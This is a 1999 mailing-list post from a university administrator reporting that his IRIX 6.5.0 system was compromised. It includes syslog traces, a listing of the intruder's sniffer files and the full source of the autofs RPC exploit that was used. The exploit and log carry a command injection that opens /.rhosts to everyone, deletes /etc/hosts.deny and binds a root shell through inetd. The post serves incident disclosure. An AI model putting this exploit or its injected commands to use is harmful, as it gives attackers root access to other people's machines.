Hacker doesn't take a break IRIS 6.5.0

Yiu-Fai Lam (YL2@umail.umd.edu)
Fri, 31 Dec 1999 15:04:31 -0500

Dear Folks,
ATTENTION:

Sorry to find out during the Christmas break that hacker broke in my
system, running IRIS 6.5.0 .
Apparently, a .rhosts file was created "+ + " and new users accounts
were set up with no passwords and with the power as root.
in SYSLOG shows that once the rhosts was created, the hackers entered
via the illegal accounts and installed an unkown number of sniff
programs in my system disks.
They created folders : afs_iris and nn , inwhich the are sniff programs
to spring to other sites.

The following attachement gave you some trace of what they did.
While I am trying to get more export helps, please let me know if you
have any comment or experience similar attacks during the same period of
time.
Appreciate any help you are willing to share,

Well, what a way to spend the New Year Eve before the Y2K!

Sincerely,
Yiu-fai Lam

====================================
Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' >
/.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root
/bin/sh sh -i" > /tmp/bob;inetd /tmp/bob failed

Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as
whatever

Dec 31 01:18:53 6E:xyz login[45746]:
?@178.phoenix-18-19rs.az.dial-access.att.net as whatever

Dec 31 01:22:39 6E:xyz login[37947]:
?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
=========================================================================

Hacker installed a sniffer as afs-irix

total 248
40 -rwxr-xr-x 1 root sys 18260 Dec 29 00:26 aa
40 -rwxr-xr-x 1 root sys 18668 Dec 29 00:19 amd
8 -rw-r--r-- 1 root sys 2759 Dec 29 00:19 autofs.c
152 -rw-r--r-- 1 root sys 74952 Dec 31 11:44 core
8 -rw-r--r-- 1 root sys 1433 Dec 31 11:44 jig
0 -rw------- 1 root sys 0 Dec 31 01:20 nohup.out
===========================================================

# more autofs.c
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>

#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)

#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024

struct mntrequest {
char *name; /* name to be looked up */
char *map; /* map to use */
char *opts; /* default options */
char *path; /* mountpoint to use */
};

struct mntres {
int status; /* 0=OK, otherwise an errno from <sys/errno.h>
*/
};

bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
return (TRUE);
}
void signal_handler(void) {
exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
if (!xdr_int(xdrs, &objp->status)) return (FALSE);
return (TRUE);
}

main(int argc, char **argv){

CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res;
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;
FILE *jackfrost;

int sd;

signal(SIGALRM, signal_handler);

alarm(AT);
host=argv[1];

if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0;

sd=RPC_ANYSOCK;
tm.tv_sec=8;

tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
{
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25;

mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo
\"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd
/tmp/bob";
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
bzero((char *)&res, sizeof(res));

if ((stat = clnt_call(cl, AUTOFS_MOUNT,
(xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}

jackfrost = fopen("jig", "a");
if ( (int)jackfrost > 0 ) {
fprintf(jackfrost, "%s\n", argv[1]);
fclose(jackfrost);
}
clnt_destroy(cl);
}

===================================================

--
Yiu-fai Lam
NMR Lab. University of Maryland, Bldg #91
Chemistry & Biochemistry Department, College Park, MD 20742.
Phone: 301-405-1869 (Voice-mail), Labs: 405-1870 or 405-8559
Fax : 301-314-9121     E-mail:  YL2@UMAIL.UMD.EDU
WEB: http://oxynmr.umd.edu